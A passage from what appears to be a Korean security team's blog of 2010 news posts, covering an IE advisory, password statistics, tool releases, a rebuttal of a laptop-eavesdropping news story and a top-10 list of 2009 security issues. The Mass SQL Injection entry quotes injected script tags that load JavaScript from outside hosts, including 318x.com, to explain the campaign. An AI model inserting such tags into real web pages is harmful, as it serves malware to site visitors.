http://www.microsoft.com/technet/security/advisory/980088.mspx

MS에서 제로데이 취약점(Vulnerability in Internet Explorer Could Allow Information Disclosure)을 발표했습니다.

공격자에 의해서 사용자PC의 파일명과 파일 위치의 정보가 노출이 된다고 합니다.
기본적으로 보호모드를 지원하지 않는 Internet Exporer 5,6 대상으로 많이 이루어지고 있으며, Internet Explorer 8 버전으로 업데이트 할 것을 권고 합니다.

보호모드 정보 : http://msdn.microsoft.com/en-us/library/ms537180(VS.85).aspx

[영향 받는 소프트웨어]
 

Windows 2000 Service Pack 4

Windows XP Service Pack 2

Windows XP Service Pack 3

Windows XP Professional x64 Edition Service Pack 2

Windows Server 2003 Service Pack 2

Windows Server 2003 x64 Edition Service Pack 2

Windows Server 2003 with SP2 for Itanium-based Systems

Windows Vista

Windows Vista Service Pack 1 and Service Pack 2

Windows Vista x64 Edition

Windows Vista x64 Edition Service Pack 1 and Service Pack 2

Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2

Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service pack 2

Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2

Windows 7 for 32-bit Systems

Windows 7 for x64-based Systems

Windows Server 2008 R2 for x64-based Systems

Windows Server 2008 R2 for Itanium-based Systems

Internet Explorer 5.01 Service Pack 4 for Microsoft Windows 2000 Service Pack 4

Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4

Internet Explorer 6 for Windows XP Service Pack 2, Windows XP Service Pack 3, and Windows XP Professional x64 Edition Service Pack 2

Internet Explorer 6 for Windows Server 2003 Service Pack 2, Windows Server 2003 with SP2 for Itanium-based Systems, and Windows Server 2003 x64 Edition Service Pack 2

Internet Explorer 7 for Windows XP Service Pack 2 and Windows XP Service Pack 3, and Windows XP Professional x64 Edition Service Pack 2

Internet Explorer 7 for Windows Server 2003 Service Pack 2, Windows Server 2003 with SP2 for Itanium-based Systems, and Windows Server 2003 x64 Edition Service Pack 2

Internet Explorer 7 in Windows Vista, Windows Vista Service Pack 1, and Windows Vista Service Pack 2, and Windows Vista x64 Edition, Windows Vista x64 Edition Service Pack 1, and Windows Vista x64 Edition Service Pack 2

Internet Explorer 7 in Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2

Internet Explorer 7 in Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2

Internet Explorer 7 in Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2

Internet Explorer 8 for Windows XP Service Pack 2 and Windows XP Service Pack 3, and Windows XP Professional x64 Edition Service Pack 2

Internet Explorer 8 for Windows Server 2003 Service Pack 2 and Windows Server 2003 x64 Edition Service Pack 2

Internet Explorer 8 in Windows Vista, Windows Vista Service Pack 1, and Windows Vista Service Pack 2, and Windows Vista x64 Edition, Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2

Internet Explorer 8 in Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2

Internet Explorer 8 in Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2

Internet Explorer 8 in Windows 7 for 32-bit Systems

Internet Explorer 8 in Windows 7 for x64-based Systems

Internet Explorer 8 in Windows Server 2008 R2 for x64-based Systems

Internet Explorer 8 in Windows Server 2008 R2 for Itanium-based Systems



구글 크롬 보안 강화 추가

보안 소식/주간 이슈 2010. 2. 1. 15:08 Posted by 알 수 없는 사용자


http://www.net-security.org/secworld.php?id=8800&utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+HelpNetSecurity+%28Help+Net+Security%29


구글 크롬의 보안기능이 더욱더 강화되었다는 소식입니다.

크롬이 제공해 주는 보안 기능은 크게 5가지 입니다.

1. 링크된 악성페이지가 로딩되는것을 막음

2. XSS를 막는 기능

3. CSRF를 막는기능

4. 암호화 통신

5. 프레임간 전달되는 메세지의 보안성 강화

가벼운 웹브라우져로 유명한 크롬이 보안성까지 더욱 추가가 되었네요 앞으로 어떻게 발전할지 기대해 봅니다.

중국의 짝퉁은 어디까지?

보안 소식/주간 이슈 2010. 1. 28. 17:08 Posted by TEAMCR@K
http://www.goojje.com/

중국에서 google과 유사한 사이트를 만들었네요. "Goojje", 중국발음으로 "오빠언니"와 비슷하다는 변명을 하고 있습니다.
구글엔진을 어데서 가져와서 한것인지...비슷하게만 만든것인지....

http://www.tomshardware.com/news/imperva-rockyou-most-common-passwords,9486.html?xtmc=imperva_application_defense_center&xtcr=1

Imperva Application Defense Center (ADC) 회사가 설정된 패스워드를 분석한 결과입니다.

통계적으로 봤을때, 사용자들이 제일 많이 사용하고 있는 패스워드는 "123456" 이고, 상위 10위에서 연속적인 숫자로만 이루어진 것이 50%나 됩니다.

상위 20위의 패스워드를 살펴보면, 모두 추측이 가능하거나 외국에서 많이 사용되고 있는 이름으로 이루어진 것을 확인할 수 있습니다.




패스워드 길이는 6~8자가 대부분 차지하고 있으며, 대부분 소.대문자로만 이루어져 있다고 합니다.



국내 금융.증권 및 포탈 사이트에서는 가입할 당시에 숫자.문자 혼합(특수문자까지 포함) 하는 회원 가입 프로세스로 이루어진 곳이 많지만, 대부분의 기업에서는 아직도 패스워드 강화 프로세스가 이루어지지 않은 것이 현실입니다.

일반 사용자들의 패스워드 설정은 아래와 같이 권고하고 있으며, 관리자급 이상은 "최소 8자 이상의 길이", "2~3개 이상의 특수문자 포함"을 권고하고 있습니다.

● 알파벳 대소문자를 혼용하여 사용
● 숫자 및 특수문자 포함
● 최소 6자 이상
● 사전에 등록된 단어, 혹은 속어, 사투리 등의 사용 금지
● 개인 정보나 관련된 정보를 포함 금지 (예. 이름, 회사, 제품 이름)
● 패스워드는 온라인 상에 별도 저장 금지
● ID와 패스워드의 동일한 문자가 4글자 이상 설정 금지

IT 2010 트렌드

보안 소식/주간 이슈 2010. 1. 27. 11:22 Posted by 알 수 없는 사용자

마이크로소프트사 에서 2010년 트렌드에 대해 정리하였습니다.

클라우드 컴퓨팅, 그린IT, 가상화 등 의 이슈들이 정리되어 있습니다.

관련주소 : http://www.msittrend.com

Nmap 5.20 Released

보안 소식/주간 이슈 2010. 1. 21. 16:26 Posted by TEAMCR@K

Nmap 5.20이 1월 20일자로 릴리즈 되었습니다.

31개의 NSE(Nmap Script Engine), OS version DB 정보 등이 강화되었습니다.

http://seclists.org/nmap-hackers/2010/0

BackTrack 4 Final Release

보안 소식/주간 이슈 2010. 1. 12. 10:17 Posted by TEAMCR@K
리눅스 기반의 LiveCD 인 BackTrack4의 Final버전이 릴리즈 되었습니다.

ISO이미지와 VM이미지를 다운로드 받을 수 있습니다.

다운로드 : http://www.backtrack-linux.org/downloads/


Security 이슈사항

보안 소식/주간 이슈 2010. 1. 11. 12:31 Posted by 알 수 없는 사용자
1. 북한 VDDoS 공격

- 북한이 새로운 형태의 DDoS공격을 준비하고 있다고 합니다.
이 공격은 기존 DDoS공격방식과 같지만 C&C서버나 프리서버의 활용후 은폐를 통해 공격지 추적을 차단한다는 것에 주안점을 둔 공격입니다.

http://www.etnews.co.kr/news/detail.html?id=201001100086
http://itnews.inews24.com/php/news_view.php?g_serial=468760&g_menu=02


2. 금보연 암호기술관리지침

- 금융보안연구원에서 '금융부분 암호기술관리 가이드'를 배포한다고 밝혔습니다.
이번 가이드의 중점 사항으로

  • 암호기술 안전성 분석
  • 암전한 암호기술 적용방안
  • 암호통신 프로토콜 안전성 분석
  • 암호통신 프로토콜 설계 및 고려사항

4가지 고려사항을 중점으로 구성되어 있습니다.

http://www.boan.com/news/articleView.html?idxno=1270

"노트북이 도청당한다" 기사에 대한 기술적 분석

I. 기사 내용


[2. 기사 요약]

노트북 컴퓨터가 도청장치로 이용될 수 있는 새로운 사실이 시연을 통해 확인되었으며, 시연내용으로 e메일이나 메신저를 통해 노트북으로 악성코드(도청)를 설치하게 되면, 노트북을 켤 때마다 마이크가 켜지면서 도청이 시작된다.

하루 정도의 노력으로 제작 가능한 수준이다.

기존의 보안 프로그램으로는 탐지가 되지 않으며, 현재로서 막을 대안이 없어 대책을 만드는 것이 시급하다.

II. 기술적 관점에서의 기사내용 분석

[1. 새로운 개념이 아닌 이미 해외에 공개된 툴 존재]

위의 기사는 0-day(patch되기 전의 새롭게 발견된 취약점)가 아니라, 악성코드가 실행된 후 감염된 PC를 악용할 수 있는 방법이며, 이러한 개념은 기존에 해외에서 원격관리용 툴로 소개되고 배포된 사례가 있습니다. 또한 유사한 사례로 Skype에 대한 위협도 보고된 바가 있습니다.(http://teamcrak.tistory.com/131 참고)
다음은 기존에 존재하던 원격 관리용 툴로 기사에서 소개된 audio capture 기능을 포함한 프로그램입니다.


[2. 악성코드 제작시간과 기술수준]

악성코드라는 것은 단 하루만에 만들어 낼 수 있는 것이 아닙니다. 시스템, 네트워크 등등 거의 모든 분야의 테크닉(은닉, 감염, 전파, 기능 등)이 집약된 결정체가 바로 악성코드 입니다. 기사에서 의미하는 하루만에 제작 가능하다는 의미는 이미 작성된 악성코드에 해당 기능을 추가하는데 걸리는 시간을 하루라고 표현한 것이라 판단됩니다.

[3. 보안 프로그램의 진단]

첫째, 기사에는 “감염된 PC를 시중에서 많이 쓰는 여러 보안프로그램으로 검사해 봤다“는 방법 자체가 보안 프로그램의 성능을 평가하기에는 부족한 평가 방법입니다. 실제 악성코드가 실행(최초 감염)되어 은닉하기까지 모든 과정을 보안 프로그램으로 모니터링하여야 올바른 진단 방법입니다.
두 번째, 최초 감염이 어떠한 취약점이 아닌 사용자 부주의에 의한 사용자 개입(직접 파일 실행)이 이루어졌을 경우 이는 사용자가 악성코드의 실행을 허용하였기 때문에 사용자의 정당한 행위로 인식하고 기존의 보안 프로그램으로 막을 수 없습니다. 만일 0-day(패치 이전의 취약점)를 이용하여 전파를 시켰다면 이를 막을 수 없는 것은 당연합니다. 또한 이번 건은 샘플이 접수되지 않은 PoC(Proof of Concept, 개념증명) 코드이기 때문에 백신 등에서 진단하지 않는 것이 당연합니다.

[4. 대응방안]

기사에서 소개한 도청프로그램에 대한 대응방안으로는 도청프로그램 자체가 아닌 악성코드의 감염을 막아야 하며, PC의 업데이트(패치) 관리 및 일반 사용자의 보안의식 재고(e메일 첨부파일 실행 시 주의 등)등이 있습니다. 따라서 아래와 같은 사용자 측면의 대응방안이 필요합니다.
1. 이메일, 메신저, 인터넷(P2P 등)에서 받은 파일 중 출처가 불분명하거나 수상한 파일은 실행하지 않고 삭제한다.
2. 불법소프트웨어를 사용하지 않고, 정품 소프트웨어를 사용한다.
3. 최신의 보안패치 적용, 강력한 패스워드 설정, 공유금지 등과 같은 기본적인 PC 보안 수칙을 준수한다.
4. 윈도우 방화벽 등의 개인용 방화벽을 사용한다.
5. 백신 등의 엔드포인트보안솔루션을 사용한다.

[5. 결론]

이번 건은 기술적 관점에서 새로운 것이 아닌 악성코드(바이러스, 웜 등) 감염 시 생길 수 있는 위협에 대한 하나를 소개한 측면이라고 봅니다.
일반 사용자는 PC 보안 수칙을 잘 준수하고, 기업/공공기관에서는 조직의 침해사고 예방/대응 지침을 잘 준수하면 예방이 가능합니다.

TeamCR@K이 선정한 2009년 보안 10대 이슈


1. DDoS 공격

가. 설명
2009년은 DDoS공격에 대한 보안 중요성을 생각하게 한 해였다. 특히,2009년 7월 7일 한국, 미국 등 16개국 86여개 사이트에 대해서 DDoS공격이 이루어졌다. 국내 주요 포털 사이트, 금융권, 보안업체 등의 서비스가 중단되면서 엄청난 금전적인 피해뿐 아니라 “IT 대한민국 굴육” 이라는 단어가 따라올 정도였다.
일반적인DDoS 공격의 대부분은 시스템을 무력화 시키는 목적보다는 금전적인 요구에 목적이 있다. DDoS공격을 하기전에 메일과 전화를 통해 협박을 하는 것도 동일한 목적이라고 할 수 있다. 그러나, 이번 DDoS 공격은 금전적인 요구가 없었고, 끝까지 공격자의 목적을 파악하기 여려운 부분이 있었다.
7.7 DDoS 대란 이후, 웹 하드 서비스를 통한 지능화 공격의 확대가 예상된다. 그만큼 기업에게만 대응을 바라기보다는 개인들의 보안 의식이 필요한 시점이다.  2010년 이후에도 DDoS 공격 시도는 꾸준히 증가할거라 예상된다.
 
TeamCR@K 7.7 DDoS 분석 문서 : http://teamcrak.tistory.com/110
 



2. 악성코드(Worm)
가. 설명

악성코드로 분류되고 있는 Worm은 기존에 메일을 통한 개인PC 감염 공격뿐만 아니라 응용프로그램, 휴대용 저장매체(USB), 모바일 등을 이용한 공격이 급속도로 확산되고 있다.
국내 사용자들의 운영체제로 많이 사용되고 있는 Windows를 포함하여, MS워드, MS 파워포인트 등 MS 취약점을 악용한 공격은 주기적으로 발생하고 있다. 또한, Acrobat의 ActionScript 기능의 취약점을 이용한 공격도 발견되고 있다.
이에 컨피커(Conficker)’, ‘2090 바이러스’등 휴대용 저장 매체(USB)를 이용한 웜 바이러스가 확산 되었다.
2010년에는 스마트폰을 겨냥한 웜 바이러스의 확산이 예상되고, 더욱 다양한 매체와 디바이스를 통한 웜 바이러스의 공격이 예상된다.
 


3. Mass SQL Injection
가. 설명
대규모 SQL 인젝션 공격(Mass SQL Injection Attack)이란 "봇넷이나 전문 스캐너 프로그램을 이용하여 무차별적으로 웹사이트를 공격하여, 취약한 사이트를의 데이터베이스 데이터를 조작하는 일련의 공격 행위"를 말한다. (참조 : http://moonslab.com/)
새로운 취약점은 아니며 SQL Injection 취약점을 이용한 새로운 공격 기법이라고 할 수 있다. 이전부터 이런 공격형태는 이루어지고 있었으나, 2008년 중순부터 국내 사이트에서 대량으로 발생하면서 이슈로 떠올랐다. 대부분의 국내 업체에서는2009년까지 이런 공격패턴들을 차단하고, 웹 어플리케이션 소스 수정을 통해서 방어를 하였다.
하지만, 2009년 10월 경부터 해외에서 기존에 “<script src=http://test.co.kr/a.js></script>” 의 삽입 형태에서 “<script src=http://318x.com></script>” 형태, <iframe> 을 포함한 형태 등으로 유도하는 스크립트를 삽입하는 공격들이 대량으로 발견되었다.
이에 대한 대응은 SQL Injection 취약점 대응방안과 동일하며, 소스코드에서 수정하지 않고 IPS 및 웹 방화벽 등에서 일시적으로 차단한 경우에는 다시 공격 대상이 될 수 있기 때문에 근본적인 대응이 필요하다.
2010년 이후에도 새로운 공격 패턴으로 인한 대량 공격이 발생할 수 있다.

[참고사이트 그림 참조]


나. 참고 사이트
(1) http://blog.scansafe.com/journal/2009/12/9/318x-sql-injection-claims-125000.html
(2) http://coffeenix.net/bbs/viewtopic.php?p=5978
(3) http://74.125.155.132/search?q=cache:3pBFy4WaCQUJ:log.mtian.net/%3Fp%3D26032+318x.com+a.htm&cd=3&hl=ko&ct=clnk&gl=kr



4. 웹 어플리케이션 공격
가. 설명

웹 서비스를 통한 공격 형태(OWASP TOP 10, SANS 20 등) 는 관리자 및 운영자, 개발자들한테도 많이 알려져 있다.
매년마다 사용자의 유연성, 편리성을 생각한 서비스가 다양화되면서, 웹 어플리케이션 공격 기법들도 다양화 되고 있다.
IPS (공격 탐지/차단 시스템), 웹 방화벽 등의 방어도 강화되고 있지만, 차단된 공격 패턴을 우회하는 기법들도 꾸준히 알려지고 있다.
2010년 이후에도 웹 어플리케이션 소스 파일에서 원천적으로 수정되지 않는한, 그리고 관리자의 보안 설정 유지, 정기적인 보안 점검이 이루어지지 않는 이상 웹 서비스를 통한 공격은 계속될 거라 예상된다.
 


5. 메신저를 이용한 공격
가. 설명
메신저의 기능은 사용자들의 기대를 만족시키기 위해서 점점 진화되고 있다. 네트워크를 통한 음성 통화(VoIP), 온라인 결제를 통한 상품 쇼핑 및 선물 주기 등 서비스가 추가된 만큼 이를 이용한 공격은 다양해지고 있다.
예로, 악성 프로그램을 배포하는 사이트 주소를 메신저를 이용하여 다른 사용자들이 클릭하도록 유도하는 방식이 많이 이루어지고 있다.
또한 메신저의 취약점을 이용하여 다른 사용자의 음성 도청을 하는 웜 바이러스도 발견되었다.

나. 참고 사이트
(1) http://blog.ahnlab.com/asec/175
(2) http://moonslab.com/297
(3) http://hauri.co.kr/customer/security/colum_view.html?intSeq=84&page=1&keyfield=&key=
(4) http://moonslab.com/338
(5) http://www.i-morning.com/news/articleView.html?idxno=41406#
 


6. 무선 공유기(AP)를 이용한 공격
가. 설명

대중들의 노트북 사용이 많아지면서 건물 내부에 있던 외부에 있던 어느 공간에서든 자신의 업무가 가능하도록 무선 공유기를 이용한 인터넷 사용이 많아졌다.
커피숍, 통신업체, 금융업체 등 업무 공간에서는 내부망을 이용한 무선AP 서비스를 제공하고 있다.
무선 공유기를 이용한 공격은 “선(Wire)”만 존재하지 않을뿐, 일반 해킹 공격과 동일하다.
공격자가 무선공유기 에 접근이 가능하다면, 동일 공유기에 접속되어 있는 네트워크, 서버 및 일반 PC는 공격 대상이 되는 것이다.
사내에서 등록이 되어 있지 않은 RougeAP(비인가 AP)를 사용한다거나, 강력한 암호화 키 방식(WPA키)를 사용하지 않는 무선공유기는 공격대상에 포함 된다.
2010 이후에는 와이브로 사업이 발전하면서 휴대용 AP를 사용하는 사람들도 많아질것이고, 보안 규정을 지키지 않는 사람들은 금전적인 피해도 발생할거라 예상된다.

나. 참고 사이트
(1) http://itnews.inews24.com/php/news_view.php?g_serial=329915&g_menu=020200
(2) http://www.ddaily.co.kr/news/news_view.php?uid=37726
(3) http://www.fnnews.com/view?ra=Sent0701m_View&corp=fnnews&arcid=080515214524&cDateYear=2008&cDateMonth=05&cDateDay=16



7. 응용 프로그램 0-day 공격
가. 설명
0-day 공격은 패치가 이루어지지 않은 상태에서 공격 코드가 발표되어 공격이 이루어지는 것을 의미한다. 패치가 이루어지지 않은 시스템은 모두 공격대상에 포함되기 때문에 심각한 피해를 초래할 수 있다.
국내 대부분의 사람들은 운영체제(MS Windows) 를 포함하여 MS계열 응응프로그램(MS Word, MS Office, MS Outlook, MS Internet Explorer 등),  Adobe 계열 응용프로그램(Adobe PDF Reader, Adobe Flash Player 등)을 많이 사용하고 있다.
다른 계열의 응용프로그램에서도 정기적으로 취약점들이 많이 발생하고 있지만, 많은 사용자들이 사용하고 있는 MS계열, Adobe 계열의 취약점이 발표되었을 때는 그만큼 파급도가 커질 수 밖에 없다.
개인 사용자들의 보안 의식이 강화되어 정기적인 업데이트가 신속히 이루어지지 않는 이상은 2010년 이후에도 많은 이슈가 될거라 예상된다.



8. 사회 공학적(Social Network) 공격
가. 설명

사회 공학적 공격은 시스템이나 네트워크의 취약점을 이용한 해킹기법이 아니라 사회적이고 심리적인 요인을 이용하여 해킹하는 것을 의미한다.
2008년에는 금융권 보이스 피싱이 이슈가 되었으며, 이 공격을 통해 지속적으로 개인의 금전적인 피해가 발생하고 있다.
2009 년에는 다른 사용자의 메신저 계정 정보를 획득하여 친구에 등록되어 있는 사람들 대상으로 메신저 피싱이 이루어지거나, 공공 장소에서 핸드폰을 훔쳐 전화번호에 등록되어 있는 사람들 대상으로 금전적인 갈취가 행해지는 사고가 발생하였다.
사람들의 심리를 이용하는 만큼 개인이 스스로 지켜나가는 방법밖에 없으며, 2010년 이후에도 새로운 공격 사례가 발생하여 사회적인 이슈가 될거라 예상된다.
 


9. 온라인 게임 해킹 및 툴
가. 설명

국내 온라인 상위 인기 게임은 동시접속자 수십만명에 이를정도로 많은 사용자가 이용하고 있으며, 해외 진출도 활성화 되고 있다.
온라인 게임 내에서 거래되고 있는 아이템은 오프라인에서 현금으로 불법 거래가 이루어져 하나의 불법 시장을 형성하고 있다.
작게는 수만원에서 크게는 수백만, 수천만원의 아이템 거래가 가능하기 때문에 계정 획득을 목적으로 한 공격이 많이 이루어지고 있다.
캐릭터의 능력 향상(레벨업)을 짧은 시간내에 이루기 위해서 “오토 플레이”, 게임을 하지 않고도 실제 게임한것과 같은 효과를 내게 하는 “Non-Client Bot”, 계정 탈취용 트로이 목마 등이 급증하고 있다. 또한, 실제 게임 환경을 동일하게 만들어 놓은 “프리서버”도 나날이 증가하고 게임 회사의 이미지 및 금전적인 피해가 발생하고 있다.
게임 업체에서는 이런 악성 프로그램을 차단하기 위해서 많은 인력과 시간, 자금을 투입하고 있으며, 앞으로도 게임 산업이 발전하는 이상 공격이 계속 될거라 예상된다.

나. 참고 사이트
(1) http://www.fnnews.com/view?ra=Sent0701m_View&corp=fnnews&arcid=080713223834&cDateYear=2008&cDateMonth=07&cDateDay=14
(2) http://www.idg.co.kr/newscenter/common/newCommonView.do?newsId=58182
(3) http://vonzo1.egloos.com/10269874
(4) http://www.zdnet.co.kr/ArticleView.asp?artice_id=00000039159855
(5) http://www.boannews.com/media/view.asp?page=3&idx=12238&search=title&find=게임
 


10. 허위 보안 제품
가. 설명
카페 및 블로그 등 많은 사용자들이 사용하는 웹 서비스에 접근할 시에 클라이언트 PC보안 프로그램을 설치하는 경우가 많을 것이다.
서비스 업체에서 제공되는 신뢰성 있는 제품이 아니라, “정기적인 사용을 위해서 결제를 요구 하는 프로그램”, “설치 후 백신 프로그램에 악성 코드로 분류하는 프로그램” 등은 금전적 사기성이나 개인정보 갈취성이 내재되어 있는 경우가 많다.
대부분 적은 금액을 요구하기 때문에 신고가 되지 않는 경우도 발생하며, 금융권을 이용할시 개인정보가 노출될 가능성도 존재한다.
2010년 이후에도 개인정보 및 금전적 갈취 목적의 프로그램이 더욱 진화되고 개인 사용자들을 위협할거라 예상된다.

나. 참고 사이트